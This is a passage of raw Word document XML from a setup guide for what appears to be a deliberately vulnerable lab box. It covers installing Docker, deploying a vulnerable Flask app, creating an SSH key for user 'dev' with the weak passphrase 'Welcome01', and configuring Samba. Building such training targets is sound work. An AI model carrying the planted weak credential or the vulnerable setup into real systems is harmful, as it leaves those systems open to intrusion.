      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker facilitates the seamless and efficient deployment of a containerised, vulnerable web application.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to perform, documented in: </w:t>
      </w:r>
      <w:hyperlink w:anchor="_b3awfjli8qeg">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">2.2. - Installing Docker</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> We will first do an apt-get update command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use the apt-get install command to install ca-certificates curl gnupg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create a directory with specific permissions in /etc/apt/keyrings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> We use curl to download the docker gpg source and gpg it </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> We change the permission to allow read permission on all users for docker.gpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> We add the repository to Apt sources </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 7:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Update and install Docker using the following apt-get install command, then verify if Docker Engine installation is successful</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can verify it by referring to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig. 2 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:hyperlink w:anchor="_b3awfjli8qeg">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">2.2. - Installing Docker</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. With that, we can now use Docker Engine to containerize our web application.</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color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gdnqs8gucc4p" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy Vulnerable Web Application</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The vulnerable web application is a custom Python Flask-based web application</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The source code can be found located throughout </w:t>
      </w:r>
      <w:hyperlink w:anchor="_2lhbrqqw8jno">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Software Source Codes / Appendix</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or attached along with the report.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to perform:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To deploy the vulnerable web application using Docker, use this command: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">docker-compose up -d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tkega1amiil" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4. Generating an SSH Private Key</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use SSH key-based authentication for remote administration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to perform, documented in: </w:t>
      </w:r>
      <w:hyperlink w:anchor="_tk67ywkceexh">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">2.4. - Generating an SSH Private Key</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> To generate an SSH private key for the user "dev," you can first log in to the user and then generate an SSH key pair using the following commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will save the file in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/dev/.ssh/id_rsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, set a passphrase of ‘Welcome01’, then </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">create the authorized_keys file and add our newly generated public key inside</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_84triglx5kz1" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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34343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rr4ghdfcwf2m" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.5.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Install and Configure Samba/CIFS File Share</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The objective is to establish a shared folder between the Docker containers and the host system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to perform, documented in:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="_d56ktbdfz5vz">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">2.5. - Install and Configure Samba/CIFS File Share</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> To install Samba, we can use apt to install Samba and verify if it is installed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:numPr>
